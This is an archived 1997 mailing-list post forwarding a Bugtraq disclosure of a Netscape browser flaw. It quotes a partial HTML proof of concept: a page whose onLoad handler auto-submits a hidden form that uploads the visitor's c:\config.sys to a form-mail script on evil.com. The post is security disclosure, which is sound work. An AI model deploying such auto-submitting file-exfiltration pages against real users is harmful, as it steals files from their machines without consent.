Netscape Exploit
Lucky Green
shamrock at netcom.com
Sat Jun 14 21:12:43 PDT 1997
>Approved-By: aleph1 at UNDERGROUND.ORG
>Date: Sat, 14 Jun 1997 19:21:30 -0500
>Reply-To: root <root at BACKWATER.PBX.ORG>
>Sender: Bugtraq List <BUGTRAQ at NETSPACE.ORG>
>From: root <root at BACKWATER.PBX.ORG>
>Subject: Netscape Exploit
>To: BUGTRAQ at NETSPACE.ORG
>
>Here is a sample it isn't complete but you get the basic idea of what is
>going on
><HTML><HEAD><TITLE>Evil-DOT-COM Homepage</TITLE><HEAD>
>
><BODY onLoad="daForm.submit()">
><FORM
> NAME="daForm"
> ACTION="http://evil.com/cgi-bin/formmail.pl"
> METHOD=POST>
>
><INPUT TYPE=FILE VALUE="c:\config.sys" Name="Save This Document on your
>Harddrive">
><INPUT TYPE=HIDDEN NAME="recipient" value="foobar at evil.com">
>
>and so on and so forth...
--Lucky Green <shamrock at netcom.com> PGP encrypted mail preferred.
Put a stake through the heart of DES! Join the quest at
http://www.frii.com/~rcv/deschall.htm
More information about the Testlist
mailing list